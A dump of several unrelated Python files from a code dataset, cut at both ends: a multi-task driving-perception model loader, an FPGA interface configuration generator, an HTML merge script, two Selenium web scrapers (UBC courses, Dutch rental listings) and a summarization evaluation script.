load_classes_TS(opt.class_path_TS) # Extracts class labels from file\n\n # to class\n model_class_TS = ResNet18(sign_classes)\n model_class_TS.load_state_dict(torch.load(classes_weights_path_TS))\n model_class_TS.to(device)\n model_class_TS.eval()\n\n # pics dir\n crop_dirs_TS = \"MultiTaskTrain/demo/TSD\"\n crop_dirs_OD = \"MultiTaskTrain/demo/OD\"\n crop_dirs_RL = \"MultiTaskTrain/demo/RL\"\n \n \n # set up OD model\n cmap = plt.get_cmap('tab20b') # 设置框的颜色\n colors = [cmap(i) for i in np.linspace(0, 1, 100)]\n\n model_OD = Darknet_OD(opt.config_path_OD, img_size=opt.img_size_OD)\n model_OD.load_weights(opt.weights_path_OD)\n print('model path: ' +opt.weights_path_OD)\n model_OD.cuda()\n\n model_OD.eval() # Set in evaluation mode\n \n classes_OD = load_classes_OD(opt.class_path_OD) # Extracts class labels from file\n\n # 一些模参数\n resize_shape=(512, 288)\n net = SCNN(input_size=resize_shape, pretrained=False)\n mean=(0.3598, 0.3653, 0.3662) # CULane mean, std\n std=(0.2573, 0.2663, 0.2756)\n transform_img = Resize(resize_shape)\n transform_to_net = Compose(ToTensor(), Normalize(mean=mean, std=std))\n \n # 加载model\n save_dict = 
torch.load(opt.weight_path_RL, map_location='cpu')\n net.load_state_dict(save_dict['net'])\n net.to(device)\n net.eval()\n\n model_RL = SegmentationModelOutputWrapper(net)\n\n Run_ODTSRL() \n","repo_name":"qingjiesjtu/ATTA","sub_path":"MultiTaskTrain/AoA_odtsrl.py","file_name":"AoA_odtsrl.py","file_ext":"py","file_size_in_byte":54379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27704855192","text":"Inc('dfaccto/util.py', abs=True)\nInc('dfaccto/axi.py', abs=True)\nInc('dfaccto/event.py', abs=True)\nInc('dfaccto/reg.py', abs=True)\n\n\nclass _OCAccel(ModuleContext):\n\n def __init__(self):\n ModuleContext.__init__(self)\n self._read_config()\n self._setup_oneshots()\n\n def _read_config(self):\n import os\n self.ContextBits = 9\n self.InterruptBits = 64\n self.Ctrl_DataBytes = 4\n self.Ctrl_AddrBits_Ctx = 32\n self.Ctrl_AddrBits_NoCtx = self.Ctrl_AddrBits_Ctx - self.ContextBits - 1 # bit 31 always 0 (selects global vs action register space)\n self.Host_DataBytes = 64 if os.environ.get('ACTION_HALF_WIDTH', False) else 128\n self.Host_AddrBits = 64\n self.Host_IdBits = os.environ.get('AXI_ID_WIDTH', 5)\n self.Host_UserBits = 1\n self.Ddr_DataBytes = 64\n self.Ddr_AddrBits = 33\n self.Ddr_IdBits = 4\n self.Ddr_UserBits = 1\n self.DdrEnabled = 'ENABLE_DDR' in os.environ\n self.Hbm_DataBytes = 32\n self.Hbm_AddrBits = 34\n self.Hbm_IdBits = 4\n self.Hbm_UserBits = 1\n self.HbmEnabled = 'ENABLE_HBM' in os.environ\n self.HbmCount = int(os.environ.get('HBM_AXI_IF_NUM', '1'))\n self.Eth_DataBytes = 64\n self.Eth_UserBits = 1\n self.EthEnabled = os.environ.get('ETHERNET_USED', 'FALSE') == 'TRUE'\n\n def _setup_oneshots(self):\n self._register_oneshot('pkg',\n lambda self: Pkg('dfaccto_ocaccel',\n x_templates={self.File('generic/package.vhd.tpl'): self.File('pkg/dfaccto_ocaccel.vhd')}))\n self._register_oneshot('tCtrlCtx',\n lambda self: self._in_pkg(\n lambda self: Axi.TypeAxi('AxiCtrlCtx',\n data_bytes=self.Ctrl_DataBytes,\n addr_bits=self.Ctrl_AddrBits_Ctx,\n has_burst=False)))\n self._register_oneshot('tCtrl',\n lambda self: self._in_pkg(\n lambda self: Axi.TypeAxi('AxiCtrl',\n data_bytes=self.Ctrl_DataBytes,\n addr_bits=self.Ctrl_AddrBits_NoCtx,\n has_burst=False)))\n self._register_oneshot('tCtrlRegCtx',\n lambda self: self._in_pkg(\n lambda self: Reg.TypePort('CtrlRegCtx',\n data_bytes=self.Ctrl_DataBytes,\n addr_bits=self.Ctrl_AddrBits_Ctx)))\n self._register_oneshot('tCtrlReg',\n lambda self: self._in_pkg(\n lambda self: Reg.TypePort('CtrlReg',\n data_bytes=self.Ctrl_DataBytes,\n addr_bits=self.Ctrl_AddrBits_NoCtx)))\n self._register_oneshot('tHost_ext',\n lambda self: self._in_pkg(\n lambda self: Axi.TypeAxi('AxiHostExt',\n data_bytes=self.Host_DataBytes,\n addr_bits=self.Host_AddrBits,\n id_bits=self.Host_IdBits,\n has_attr=True,\n aruser_bits=self.ContextBits,\n awuser_bits=self.ContextBits,\n ruser_bits=self.Host_UserBits,\n wuser_bits=self.Host_UserBits,\n buser_bits=self.Host_UserBits)))\n self._register_oneshot('tHostCtx',\n lambda self: self._in_pkg(\n lambda self: Axi.TypeAxi('AxiHostCtx',\n data_bytes=self.Host_DataBytes,\n addr_bits=self.Host_AddrBits,\n id_bits=self.Host_IdBits,\n aruser_bits=self.ContextBits,\n awuser_bits=self.ContextBits)))\n self._register_oneshot('tHost',\n lambda self: self._in_pkg(\n lambda self: Axi.TypeAxi('AxiHost',\n data_bytes=self.Host_DataBytes,\n addr_bits=self.Host_AddrBits,\n id_bits=self.Host_IdBits)))\n self._register_oneshot('tDdr_ext',\n lambda self: self._in_pkg(\n lambda self: 
Axi.TypeAxi('AxiDdrExt',\n data_bytes=self.Ddr_DataBytes,\n addr_bits=self.Ddr_AddrBits,\n id_bits=self.Ddr_IdBits,\n has_attr=True,\n aruser_bits=self.Ddr_UserBits,\n awuser_bits=self.Ddr_UserBits,\n ruser_bits=self.Ddr_UserBits,\n wuser_bits=self.Ddr_UserBits,\n buser_bits=self.Ddr_UserBits)))\n self._register_oneshot('tDdr',\n lambda self: self._in_pkg(\n lambda self: Axi.TypeAxi('AxiDdr',\n data_bytes=self.Ddr_DataBytes,\n addr_bits=self.Ddr_AddrBits,\n id_bits=self.Ddr_IdBits)))\n self._register_oneshot('tHbm_ext',\n lambda self: self._in_pkg(\n lambda self: Axi.TypeAxi('AxiHbmExt',\n data_bytes=self.Hbm_DataBytes,\n addr_bits=self.Hbm_AddrBits,\n id_bits=self.Hbm_IdBits,\n has_attr=True,\n aruser_bits=self.Hbm_UserBits,\n awuser_bits=self.Hbm_UserBits,\n ruser_bits=self.Hbm_UserBits,\n wuser_bits=self.Hbm_UserBits,\n buser_bits=self.Hbm_UserBits)))\n self._register_oneshot('tHbm',\n lambda self: self._in_pkg(\n lambda self: Axi.TypeAxi('AxiHbm',\n data_bytes=self.Hbm_DataBytes,\n addr_bits=self.Hbm_AddrBits,\n id_bits=self.Hbm_IdBits)))\n self._register_oneshot('tEth',\n lambda self: self._in_pkg(\n lambda self: Axi.TypeStream('StmEth',\n data_bytes=self.Eth_DataBytes,\n user_bits=self.Eth_UserBits)))\n self._register_oneshot('tCtx',\n lambda self: self._in_pkg(\n lambda self: Util.TypeUnsigned('Context', width=self.ContextBits)))\n self._register_oneshot('tIntrSrc',\n lambda self: self._in_pkg(\n lambda self: Util.TypeUnsigned('InterruptSrc', width=self.InterruptBits)))\n self._register_oneshot('tIntrCtx',\n lambda self: self._in_pkg(\n lambda self: TypeC('InterruptCtx', x_is_interrupt=True,\n x_definition=self.Part('types/definition/interrupt.part.tpl'),\n x_format_ms=self.Part('types/format/interrupt_ms.part.tpl'),\n x_format_sm=self.Part('types/format/interrupt_sm.part.tpl'),\n x_wrapeport=self.Part('types/wrapeport/interrupt.part.tpl'),\n x_wrapeconv=self.Part('types/wrapeconv/interrupt.part.tpl'),\n x_wrapipmap=self.Part('types/wrapipmap/interrupt.part.tpl'),\n x_wrapigmap=None,\n x_tlogic=Util.tlogic,\n x_tctx=self.tCtx,\n x_tsrc=self.tIntrSrc,\n x_cnull=lambda t: Con('InterruptCtxNull', t, value=Lit({})))))\n self._register_oneshot('tIntr',\n lambda self: self._in_pkg(\n lambda self: Event.TypeEvent('Interrupt',\n stb_bits=self.InterruptBits)))\n self._register_oneshot('EntCtrlDemux',\n lambda self: Reg.EntDemux('OCAccelCtrlDemux',\n axi_type=OCAccel.tCtrl,\n reg_type=OCAccel.tCtrlReg,\n x_file=self.File('entity/ocaccel/CtrlDemux.vhd')))\n self._register_oneshot('EntRegFile',\n lambda self: Reg.EntFile('OCAccelRegFile',\n reg_type=self.tCtrlReg,\n x_file=self.File('entity/ocaccel/RegFile.vhd')))\n self._register_oneshot('EntControl',\n lambda self: Ent('OCAccelControl',\n Generic('StartCount', Util.tsize, label='gscount'),\n Generic('ExtIrqCount', Util.tsize, label='gicount'),\n Generic('ActionType', Util.tsize, label='gactyp'),\n Generic('ActionVersion', Util.tsize, label='gacver'),\n PortI('sys', Util.tsys, label='psys'),\n PortS('reg', self.tCtrlReg, label='preg'),\n PortM('intr', self.tIntr, label='pintr'),\n PortM('start', Event.tEvent , vector='StartCount', label='pstart'),\n PortS('irq', Event.tEvent, vector='ExtIrqCount', label='pirq'),\n x_ebarrier=Util.Barrier,\n x_earbiter=Util.ArbiterStable,\n x_eregfile=self.EntRegFile,\n x_util=Util.pkg_util,\n x_templates={self.File('entity/ocaccel/Control.vhd.tpl'): self.File('entity/ocaccel/Control.vhd')}))\n self._register_oneshot('EntSimplifyHost',\n lambda self: Axi.EntWiring('OCAccelSimplifyHost',\n 
master_type=self.tHost_ext,\n slave_type=self.tHostCtx,\n master_mode='full',\n slave_mode='full',\n x_file=self.File('entity/ocaccel/SimplifyHost.vhd')))\n self._register_oneshot('EntSimplifyDdr',\n lambda self: Axi.EntWiring('OCAccelSimplifyDdr',\n master_type=self.tDdr_ext,\n slave_type=self.tDdr,\n master_mode='full',\n slave_mode='full',\n x_file=self.File('entity/ocaccel/SimplifyDdr.vhd')))\n self._register_oneshot('EntSimplifyHbm',\n lambda self: Axi.EntWiring('OCAccelSimplifyHbm',\n master_type=self.tHbm_ext,\n slave_type=self.tHbm,\n master_mode='full',\n slave_mode='full',\n x_file=self.File('entity/ocaccel/SimplifyHbm.vhd')))\n self._register_oneshot('EntSingleContext',\n lambda self: Ent('OCAccelSingleContext',\n PortI('sysCtx', Util.tsys, label='psysc'),\n PortM('intrCtx', self.tIntrCtx, label='pintrc'),\n PortS('ctrlCtx', self.tCtrlCtx, label='pctrlc'),\n PortM('hostCtx', self.tHostCtx, label='phostc'),\n PortO('sys', Util.tsys, label='psys'),\n PortS('intr', self.tIntr, label='pintr'),\n PortM('ctrl', self.tCtrl, label='pctrl'),\n PortS('host', self.tHost, label='phost'),\n x_util=Util.pkg_util,\n x_templates={self.File('entity/ocaccel/SingleContext.vhd.tpl'): self.File('entity/ocaccel/SingleContext.vhd')}))\n\n def _in_pkg(self, func):\n with self.pkg:\n return func(self)\n\n def EntWrapper(self, name, single_context, x_file):\n psys_name = 'sysCtx' if single_context else 'sys'\n pintr_name = 'intrCtx' if single_context else 'intr'\n pctrl_name = 'ctrlCtx' if single_context else 'ctrl'\n shost_name = 'hostCtx' if single_context else 'host'\n\n ports = [PortI(psys_name, Util.tsys, x_wrapname='ap'),\n PortM(pintr_name, self.tIntrCtx, x_wrapname='interrupt'),\n PortS(pctrl_name, self.tCtrlCtx, x_wrapname='s_axi_ctrl_reg'),\n PortM('host_ext', self.tHost_ext, x_wrapname='m_axi_host_mem')]\n if self.DdrEnabled:\n ports.append(PortM('ddr', self.tDdr_ext, x_wrapname='m_axi_card_mem0'))\n if self.HbmEnabled:\n for i in range(self.HbmCount):\n name = 'hbm{:d}'.format(i)\n wrapname = 'm_axi_card_hbm_p{:d}'.format(i)\n ports.append(PortM(name, self.tHbm_ext, x_wrapname=wrapname))\n if self.EthEnabled:\n ports.append(PortM('ethTx', self.tEth, x_wrapname='dout_eth'))\n ports.append(PortS('ethRx', self.tEth, x_wrapname='din_eth'))\n ports.append(PortO('ethRxRst', Util.tlogic, x_wrapname='eth_rx_fifo_reset'))\n ports.append(PortI('ethRxStatus', Util.tlogic, x_wrapname='eth_stat_rx_status'))\n ports.append(PortI('ethRxAligned', Util.tlogic, x_wrapname='eth_stat_rx_aligned'))\n\n ewrap = Ent(name, *ports,\n x_templates={self.File('generic/ext_wrapper.vhd.tpl'): x_file})\n with ewrap:\n Ins(self.EntSimplifyHost.name, 'simplifyHost',\n MapPort('master', S('host_ext')),\n MapPort('slave', S(shost_name)))\n if self.DdrEnabled:\n Ins(self.EntSimplifyDdr.name, 'simplifyDdr',\n MapPort('master', S('ddr_ext')),\n MapPort('slave', S('ddr')))\n if self.HbmEnabled:\n for i in range(self.HbmCount):\n Ins(self.EntSimplifyHbm.name, 'simplifyHbm{:d}'.format(i),\n MapPort('master', S('hbm{:d}_ext'.format(i))),\n MapPort('slave', S('hbm{:d}'.format(i))))\n if single_context:\n Ins(self.EntSingleContext.name, 'singleContext',\n MapPort('sysCtx', S(psys_name)),\n MapPort('intrCtx', S(pintr_name)),\n MapPort('ctrlCtx', S(pctrl_name)),\n MapPort('hostCtx', S(shost_name)),\n MapPort('sys', S('sys')),\n MapPort('intr', S('intr')),\n MapPort('ctrl', S('ctrl')),\n MapPort('host', S('host')))\n\n S('host').set_default((self.tHost if single_context else self.tHostCtx).x_cnull)\n if self.DdrEnabled:\n 
S('ddr').set_default(self.tDdr.x_cnull)\n if self.HbmEnabled:\n for i in range(self.HbmCount):\n S('hbm{:d}', expand=i).set_default(self.tHbm.x_cnull)\n return ewrap\n\nOCAccel = _OCAccel()\n","repo_name":"lw0/dfaccto_lib","sub_path":"cfg/ocaccel.py","file_name":"ocaccel.py","file_ext":"py","file_size_in_byte":12449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70338833192","text":"from bs4 import BeautifulSoup\r\n\r\n# List of file names to merge\r\nfiles = [\"Explorer.html\", \"HexapodController.html\", \"HexapodExplorer.html\", \"HexapodRobot.html\"]\r\n\r\n# Read the contents of each file into a BeautifulSoup object\r\nsoups = [BeautifulSoup(open(file), \"html.parser\") for file in files]\r\n\r\n# Merge the contents of all BeautifulSoup objects into one\r\nmerged_soup = BeautifulSoup(\"\", \"html.parser\")\r\nfor soup in soups:\r\n merged_soup.append(soup)\r\n\r\n# Write the merged content to a new file\r\nwith open(\"../Documentation.html\", \"w\") as outfile:\r\n outfile.write(str(merged_soup))","repo_name":"malek-luky/Artificial-Intelligence-in-Robotics","sub_path":"Semester_Project/docs/merge_script.py","file_name":"merge_script.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73917312551","text":"from lib2to3.pgen2 import driver\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.common.exceptions import NoSuchElementException \r\nimport time\r\nimport pandas as pd\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\n\r\ndef scrape_classes():\r\n\r\n df = pd.DataFrame(columns=['Campus','Year','Season','Department','Course code','Name','Credits','Pre-reqs','Co-reqs','Restrictions','Pre-req string','Description','URL'])\r\n\r\n browser = webdriver.Chrome()\r\n browser.get(\"https://courses.students.ubc.ca/cs/courseschedule\")\r\n browser.find_element(By.XPATH,\"//button[contains(text(),'Campus')]\").click()\r\n time.sleep(1)\r\n elem_campuses = browser.find_elements(By.XPATH,\"//ul[@class='dropdown-menu']//descendant::a[contains(@title,'UBC')]\")\r\n i = 0\r\n string_campuses = list()\r\n for elem_campus in elem_campuses:\r\n string_campuses.append(elem_campus.get_attribute(\"title\"))\r\n\r\n for string_campus in string_campuses: \r\n browser.find_element(By.XPATH,\"//button[contains(text(),'Session')]\").click()\r\n time.sleep(1)\r\n elem_sessions = browser.find_elements(By.XPATH,\"//ul[@class='dropdown-menu']//descendant::a[contains(@title,'20')]\")\r\n\r\n string_sessions = list()\r\n for elem_session in elem_sessions:\r\n string_sessions.append(elem_session.text)\r\n\r\n for string_session in string_sessions:\r\n season = string_session.split(\" \")[1][0]\r\n year = string_session.split(\" \")[0]\r\n browser.get(\"https://courses.students.ubc.ca/cs/courseschedule?tname=subj-all-departments&sessyr={}&sesscd={}&campuscd={}&pname=subjarea\".format(year,season,string_campus))\r\n \r\n try:\r\n elem_depts = browser.find_elements(By.XPATH,\"//tr[contains(@class,'section')]\") \r\n except NoSuchElementException:\r\n continue\r\n \r\n string_depts = list()\r\n for elem_dept in elem_depts:\r\n string_depts.append(elem_dept.text)\r\n\r\n for string_dept in string_depts: \r\n if '*' in string_dept:\r\n continue\r\n dept_code = string_dept.split(\" \")[0]\r\n 
browser.get(\"https://courses.students.ubc.ca/cs/courseschedule?tname=subj-department&sessyr={}&sesscd={}&campuscd={}&dept={}&pname=subjarea\".format(year,season,string_campus,dept_code))\r\n elem_courses = browser.find_elements(By.XPATH,\"//tr[contains(@class,'section')]\")\r\n\r\n string_courses = list()\r\n for elem_course in elem_courses:\r\n string_courses.append(elem_course.text)\r\n\r\n\r\n for string_course in string_courses:\r\n course_num = string_course.split(\" \")[1]\r\n url = \"https://courses.students.ubc.ca/cs/courseschedule?sesscd={}&campuscd={}&pname=subjarea&tname=subj-course&course={}&sessyr={}&dept={}\".format(season,string_campus,course_num,year,dept_code)\r\n browser.get(url)\r\n\r\n \r\n pre_reqs = list()\r\n pre_req_str = \"\"\r\n try:\r\n elem_pre_reqs = browser.find_elements(By.XPATH,\"//p[contains(text(),'Pre-reqs:')]//descendant::a\")\r\n pre_req_str = browser.find_element(By.XPATH,\"//p[contains(text(),'Pre-reqs:')]\").text\r\n for elem_pre_req in elem_pre_reqs:\r\n pre_reqs.append(elem_pre_req.text)\r\n except:\r\n pass\r\n\r\n co_reqs = list()\r\n try:\r\n elem_co_reqs = browser.find_elements(By.XPATH,\"//p[contains(text(),'Co-reqs:')]//descendant::a\")\r\n for elem_co_req in elem_co_reqs:\r\n co_reqs.append(elem_co_req.text)\r\n except:\r\n pass\r\n \r\n name = browser.find_element(By.XPATH,\"//h4\").text\r\n desc = browser.find_element(By.XPATH,\"//div[@role = 'main']/descendant::p[1]\").text\r\n credits = browser.find_element(By.XPATH,\"//p[contains(text(),'Credits:')]\").text.split(':')[1]\r\n\r\n try:\r\n restrictions = browser.find_element(By.XPATH,\"//li[contains(text(),'restricted to students')]\").text\r\n except:\r\n pass\r\n\r\n str_co_reqs = \"\"\r\n\r\n for co_req in co_reqs:\r\n str_co_reqs = str_co_reqs + co_req + \",\"\r\n\r\n \r\n str_pre_reqs = \"\"\r\n\r\n for pre_req in pre_reqs:\r\n str_pre_reqs = str_pre_reqs + pre_req + \",\"\r\n\r\n df.loc[len(df.index)]=[string_campus,year,season,dept_code,course_num,name,credits,str_pre_reqs[:-1],str_co_reqs[:-1],restrictions,pre_req_str,desc,url]\r\n print(str(round((i/9657)*100,2)) + \"%\")\r\n i +=1\r\n \r\n df.to_csv(\"courses.csv\")\r\n\r\nscrape_classes()\r\n\r\n","repo_name":"Ferdinand737/UBC-Course-Bot","sub_path":"Scrape.py","file_name":"Scrape.py","file_ext":"py","file_size_in_byte":5191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1654252288","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nimport re, datetime, os, pickle, time\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\n\noptions = Options()\noptions.headless = True\noptions.add_argument('--disable-dev-shm-usage')\noptions.add_argument('--no-sandbox')\noptions.add_argument('--disable-gpu')\n\n\ndef haaglanden_aanbod():\n current_time = datetime.datetime.now()\n\n chromedriver_location = os.path.join(os.path.dirname(__file__), 'chromedriver')\n #laden van de website met Selenium en een timeout\n driver = webdriver.Chrome(options=options,\n executable_path=chromedriver_location)\n driver.get('https://www.woonnet-haaglanden.nl/aanbod/te-huur#?ik-zoek-een=1&gesorteerd-op=publicatiedatum-')\n timeout = 4\n try:\n element_present = EC.presence_of_element_located((By.ID, 'main'))\n WebDriverWait(driver, timeout).until(element_present)\n except 
TimeoutException:\n print(\"Timed out for Haaglanden_overzicht\")\n finally:\n print(\"Page loaded\")\n\n #laden van de database\n if os.path.isfile('cache_folder/database_haaglanden.txt'):\n with open('cache_folder/database_haaglanden.txt', 'rb') as f:\n database = pickle.load(f)\n else:\n database = []\n\n # scroll naar het einde van de pagina om alle container te laden.\n SCROLL_PAUSE_TIME = 0.5\n last_height = driver.execute_script(\"return document.body.scrollHeight\")\n while True:\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n time.sleep(SCROLL_PAUSE_TIME)\n new_height = driver.execute_script(\"return document.body.scrollHeight\")\n if new_height == last_height:\n break\n last_height = new_height\n\n time.sleep(2)\n\n containers = driver.find_elements_by_xpath(\"//ng-include[@class='ng-scope']\")\n #scraping van de containers op de website\n entries = []\n for x in range(0, len(containers)):\n string = re.sub(r'\\n|\\t|', '', containers[x].get_attribute('innerHTML').strip())\n string = re.split('<|>', string)\n if True in [(\"ng-href\" in x) for x in string]:\n index = [(\"ng-href\" in x) for x in string].index(True)\n page_url = re.split('\\\"|\\\"', string[index])[1]\n page_url = \"https://www.woonnet-haaglanden.nl{}\".format(page_url)\n raw_adres = 'span ng-bind-html=\"::object.street\" class=\"ng-binding\"'\n adres = string[string.index(raw_adres) + 1] if raw_adres in string else ''\n adres += string[string.index(raw_adres) + 3] if raw_adres in string else ''\n raw_plaats = 'span class=\"address-part ng-binding ng-scope\" ng-if=\"::!hideAdresCity\"'\n plaats = string[string.index(raw_plaats) + 1] if raw_plaats in string else ''\n raw_prijs = 'span class=\"prijs ng-binding ng-scope\" ng-if=\"::!toonAangepasteHuurprijs(object)\"'\n prijs = string[string.index(raw_prijs) + 1].replace(' ','') if raw_prijs in string else ''\n raw_type_verhuur = 'span class=\"object-label-value ng-scope\" translate=\"ModelCategorie'\n index_type_verhuur = [(raw_type_verhuur in x) for x in string]\n type_verhuur = string[index_type_verhuur.index(True) + 1] if True in index_type_verhuur else ''\n raw_omschrijving = 'span class=\"icon-icon_woonoppervlakte object-label-icon\"'\n omschrijving = string[string.index(raw_omschrijving) + 5] if raw_omschrijving in string else ''\n entry = [adres, omschrijving, plaats, prijs, type_verhuur, page_url]\n\n #vergelijk deze entry met de database en als de entry nog niet voorkomt in de database, dan alleen toevoegen aan entries en uiteindelijk de database\n if entry not in database and entry.count('') < 2:\n entries.append(entry)\n database.append(entry)\n\n if len(entries) > 0:\n with open('cache_folder/database_haaglanden.txt', 'wb') as f:\n pickle.dump(database, f)\n\n if os.path.isfile('cache_folder/{}{}_haaglanden_overzicht.txt'.format(current_time.month, current_time.day)):\n with open('cache_folder/{}{}_haaglanden_overzicht.txt'.format(current_time.month, current_time.day), 'rb') as f:\n cache = pickle.load(f)\n cache.extend(entries)\n with open('cache_folder/{}{}_haaglanden_overzicht.txt'.format(current_time.month, current_time.day), 'wb') as f:\n pickle.dump(cache, f)\n else:\n with open('cache_folder/{}{}_haaglanden_overzicht.txt'.format(current_time.month, current_time.day), 'wb') as f:\n pickle.dump(entries, f)\n driver.quit()\n return entries\n\ndef aanbod_message():\n current_time = datetime.datetime.now()\n if os.path.isfile('cache_folder/{}{}_haaglanden_overzicht.txt'.format(current_time.month, current_time.day)):\n with 
open('cache_folder/{}{}_haaglanden_overzicht.txt'.format(current_time.month, current_time.day), 'rb') as f:\n input = pickle.load(f)\n else:\n input = haaglanden_aanbod()\n message = ''\n if len(input) > 0:\n #limit message length\n max_entries = len(input) if len(input) < 15 else 14\n for x in range(0, max_entries):\n message += \"\\n\\n{} in {}\\n{} voor {}\\n{}\".format(input[x][5], input[x][0], input[x][2], input[x][1], input[x][3], input[x][4])\n else:\n message = 'Er zijn geen (nieuwe) woningen gevonden vandaag.'\n return message\n","repo_name":"kcvanderlinden/Woonnet_bot","sub_path":"Haaglanden_overzicht.py","file_name":"Haaglanden_overzicht.py","file_ext":"py","file_size_in_byte":5697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4757019425","text":"import itertools\nimport os\nos.environ['TOKENIZERS_PARALLELISM'] = 'false'\nimport ujson\n\nimport pandas as pd\nimport argparse\nimport spacy\nimport numpy as np\nfrom scipy.stats import pearsonr\nimport torch\nfrom transformers import AutoTokenizer\nfrom tqdm import tqdm\nfrom scipy.special import expit\n\nfrom data_utils import get_path_from_exp\nfrom eval.rouge_metric import RougeMetric\nfrom preprocess.convert_abstractive_to_extractive import gain_selection\nfrom gen_transformers.model import TransformerSummarizer\nfrom gen_transformers.model_utils import sentence_mask\nfrom preprocess.extract_oracles import convert_to_sents\nfrom datasets import load_dataset\n\nos.environ['ROUGE_HOME'] = os.path.expanduser('~/faith-sum/eval/ROUGE-1.5.5/')\nnp.random.seed(1992)\n\n\ndef compute_rouge(generated, gold, rouge_metric, prefix=''):\n outputs = rouge_metric.evaluate_batch(generated, gold, aggregate=True)['rouge']\n f1s = []\n stats = {}\n for rouge_type in ['1', '2', 'L']:\n fscore = outputs[f'rouge_{rouge_type.lower()}_f_score']\n stats[f'{prefix}rouge{rouge_type}_precision'] = outputs[f'rouge_{rouge_type.lower()}_precision']\n stats[f'{prefix}rouge{rouge_type}_recall'] = outputs[f'rouge_{rouge_type.lower()}_recall']\n stats[f'{prefix}rouge{rouge_type}_f1'] = fscore\n f1s.append(fscore)\n stats[f'{prefix}mean_f1'] = np.array(f1s).mean()\n return stats\n\n\ndef get_alignments(source_toks, summary, nlp):\n sum_sents = convert_to_sents(summary, nlp)\n sum_sents_tok = [[str(token.text) for token in sentence] for sentence in sum_sents]\n aligned_sents = list(map(lambda x: gain_selection(source_toks, [x], 3, lower=False, sort=False)[0], sum_sents_tok))\n aligned_sents_flat = list(set(list(itertools.chain(*aligned_sents))))\n return aligned_sents, aligned_sents_flat\n\n\ndef get_idx(idx_str):\n idxs = idx_str.split(',')\n return list(map(int, idxs))\n\n\ndef get_priority(source_toks, summary, nlp):\n sum_sents = convert_to_sents(summary, nlp)\n sum_sents_tok = [[str(token.text) for token in sentence] for sentence in sum_sents]\n gs = gain_selection(source_toks, sum_sents_tok, summary_size=0)\n sent_r1s = list(map(lambda x: float(x), gs[2].split(',')))\n sent_r2s = list(map(lambda x: float(x), gs[3].split(',')))\n assert len(sent_r1s) == len(source_toks)\n avg_rs = np.array([(a + b) / 2.0 for (a, b) in zip(sent_r1s, sent_r2s)])\n return np.argsort(- avg_rs), avg_rs\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser('Mask Cross Attention and Generate')\n\n parser.add_argument('--extractor', default='extract', choices=['oracle', 'extract'])\n parser.add_argument('--gpu_device', default=1, type=int)\n parser.add_argument('--data_dir', 
default='/nlp/projects/faithsum')\n parser.add_argument('--wandb_name', default='score_abstract_kld')\n parser.add_argument('-debug', default=False, action='store_true')\n parser.add_argument('--hf_model', default='facebook/bart-base')\n parser.add_argument('--max_examples', default=1000, type=int)\n parser.add_argument('--k', default=10, type=int)\n\n args = parser.parse_args()\n\n oracle_df = pd.read_csv(os.path.join(args.data_dir, 'cnn_dailymail/oracle/validation_v2.csv'))\n results_dir = os.path.join(args.data_dir, 'results', args.wandb_name)\n outputs = pd.read_csv(os.path.join(results_dir, 'validation_beam_outputs.csv'))\n n = len(outputs)\n if n > args.max_examples:\n outputs = outputs.sample(n=args.max_examples, replace=False, random_state=1992)\n nlp = spacy.load('en_core_web_sm')\n\n dataset = load_dataset('cnn_dailymail', '3.0.0')['validation']\n dataset_idx2id = dataset['id']\n orig_sources = dataset['article']\n\n ids2oracles = {row['id']: row for row in oracle_df.to_dict('records')}\n records = outputs.to_dict('records')\n weight_dir = os.path.join(args.data_dir, 'weights')\n\n ckpt_path = get_path_from_exp(weight_dir, args.wandb_name)\n tokenizer_dir = os.path.join(weight_dir, args.wandb_name, 'tokenizer')\n print(f'Loading tokenizer from {tokenizer_dir}...')\n tokenizer = AutoTokenizer.from_pretrained(pretrained_model_name_or_path=tokenizer_dir)\n\n additional_ids = tokenizer.additional_special_tokens_ids\n special_id_min = 999999 if len(additional_ids) == 0 else min(tokenizer.additional_special_tokens_ids)\n\n print(f'Loading model from {ckpt_path}...')\n model = TransformerSummarizer.load_from_checkpoint(\n checkpoint_path=ckpt_path, tokenizer=tokenizer, hf_model=args.hf_model, strict=False).to(args.gpu_device).eval()\n\n rouge_metric = RougeMetric()\n n = len(records)\n sample_out = []\n rank_dataset = []\n for record in tqdm(records, total=n):\n oracle_obj = ids2oracles[dataset_idx2id[record['dataset_idx']]]\n source = orig_sources[record['dataset_idx']]\n source_sents = convert_to_sents(source, nlp)\n n = len(source_sents)\n\n sent_scores = np.array(list(map(float, record['sent_scores'].split(','))))\n num_trunc_sent = len(sent_scores) # Up to 1024 tokens usually sometimes reduces number of sentences\n assert num_trunc_sent <= len(source_sents)\n source_sents = source_sents[:num_trunc_sent]\n\n rank_example = {\n 'dataset_idx': record['dataset_idx'],\n 'source_sents': [str(x) for x in source_sents],\n 'reference': record['reference'],\n 'abstract': record['abstract'],\n 'priority': {\n 'prob': [],\n 'source_idxs': []\n },\n 'sampled': {\n 'source_idxs': [],\n 'scores': [],\n 'extracts': [],\n 'abstracts': [],\n }\n }\n\n source_annotated = ''.join([f' {s}' for i, s in enumerate(source_sents)])\n # Get source tokens\n source_sents_tok = [[str(token.text) for token in sentence] for sentence in source_sents]\n pred_abstract = record['abstract']\n reference = record['reference']\n\n extract_priority = (-sent_scores).argsort()\n extract_scores = sent_scores[extract_priority]\n extract_scores_norm = expit(extract_scores)\n # extract_scores_norm[extract_scores_norm < 0.1] = 0.0\n # emin, emax = extract_scores_norm.min(), extract_scores_norm.max()\n # extract_scores_norm = (extract_scores_norm - emin) / (emax - emin)\n oracle_priority, 